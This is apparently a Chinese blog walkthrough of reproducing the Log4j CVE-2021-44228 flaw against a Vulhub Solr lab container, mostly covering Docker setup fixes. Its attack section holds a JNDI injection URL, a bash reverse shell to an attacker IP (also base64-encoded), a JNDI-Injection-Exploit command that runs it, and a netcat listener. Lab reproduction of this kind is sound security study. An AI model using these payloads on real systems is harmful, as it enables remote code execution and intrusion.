【vluhub】log4j注入漏洞 CVE-2021-44228

LOG4介绍

是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布
log4j存在远程代码执行漏洞、受影响版本2.x

部署环境

攻击机环境:192.168.3.180

kail环境:192.168.203.12【NAT转换的】

部署vluhub

具体流程参考其他博主,本文主要讲解在部署vluhub过程中存在的几个问题,作为记录

问题一、apt-get install docker docker-compose,执行失败,下载失败,修改外网下载也失败

获取离线安装包

直通车

Releases · docker/compose · GitHub

具体版本

下载后存储至

赋予执行权限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

问题二、

wget https://github.com/vulhub/vulhub/archive/master.zip下载失败 

手动下载https://github.com/vulhub/vulhub/archive/master.zip

上传解压

unzip vulhub-master.zip

cd vulhub-master

问题三、docker compose up -d执行失败

由于修改vluhub外网导致,需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d

端口8983搭建成功

地址访问

http://192.168.203.12:8983/solr/admin/cores?action=1

 验证是否存在漏洞

DNSLog Platform

 

替换发送请求

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}

 刷新dns右边这个按钮 出现下方内容则存在

 bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

获取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

 

执行

 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成获取ldap内容 有用

创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装

直通车

 netcat 1.11 for Win32/Win64

安装后火绒会报毒,运行

然后在该路径下执行  nc-lvvp 6666

将生成ldap内容复制替换,重新刷新一下接口

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}

 getshell了

大概就是这么个流程!

 哦 最后一步移除环境

docker-compose down

参考:

centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客

Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客

  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值